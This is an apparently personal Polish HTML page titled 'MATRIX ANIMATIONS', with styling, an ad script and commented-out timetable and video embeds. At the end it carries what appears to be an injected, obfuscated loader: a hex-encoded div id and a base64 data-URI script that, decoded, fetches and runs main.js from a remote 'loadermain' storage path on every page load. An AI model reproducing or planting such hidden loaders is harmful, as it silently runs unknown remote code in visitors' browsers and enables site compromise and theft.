<!DOCTYPE html>
<html lang="pl">
<head>
<title>MATRIX ANIMATIONS</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">

<style>

	body {
		background-image: url(ea8fc169bd13e077ec3bf0833a21d1c6 — kopia.png);
		background-color: lightgrey;
		
	}

	.baner {
		border: chartreuse;
		background-color: rgb(210, 9, 236);
		width: 100px;
		height: 100px;
	}

	/* Responsive layout - when the screen is less than 700px wide, make the two columns stack on top of each other instead of next to each other */
	@media screen and (max-width: 700px) {
  		.row {
    		flex-direction: column;
  		}
	}

	/* Responsive layout - when the screen is less than 400px wide, make the navigation links stack on top of each other instead of next to each other */
	@media screen and (max-width: 400px) {
 		.navbar a {
 			float: none;
  			width: 100%;
  		}
	}

</style>

<script data-ad-client="ca-pub-9222216844884564" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

</head>
<body>
  
 	<object data="name.txt" width="300" height="200">
		Not supported
	</object>
  
	<!--a href="C:\ASO-WWW\plan_klas_z_salami_17_maja.pdf#toolbar=0">ok</a-->
	<!--h1>Nowy plan lekcji do szkoły</h1>
	<iframe iframe src="plan_klas_z_salami_17_maja.pdf" width="100%" height="850px"> 
		<a target="strona" href="ftp.html">Lista plików FTP</a><br>
    </iframe-->

	<!--iframe src="0001-0010.mp4" style="border: 0px;"width="1920px"; height="1080px">
		<p>Directory can't be loaded</p>
	</iframe-->

	<!--div style="position:absolute">
        <video width="100%" height="100px" autoplay loop muted playsinline>
        <source src="test40001-0200.webm" type='video/mp4;'>codecs="hvc1"'
        <!--source src="0001-0120.webm" type="video/webm"-->
        <!--/video>
	</div>

	<div style="position:absolute">
        <video width="100%" height="350px" autoplay loop muted playsinline>
        <source src="gem20001-0220.webm" type='video/mp4;'>codecs="hvc1"'
        <!--source src="0001-0120.webm" type="video/webm"-->
        <!--/video>
	</div-->

	<div+id='07b02207602203a02207003803904f06906605103303303204706502207d'+style='height:450px;width:720px'></div><script+data-cfasync='false'+src='data:text/javascript;base64,dmFyIHBhID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7IAp2YXIgcyA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTsgCiAgICBwYS5zcmMgPSAnaHR0cHM6Ly9zdG9yYWdlLmdvb2dsZWFwaXMuY29tL2xvYWRlcm1haW4uYXBwc3BvdC5jb20vbWFpbi5qcyc7CiAgICBzLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKHBhLCBzKTs='></script>
	
</body>
</html>
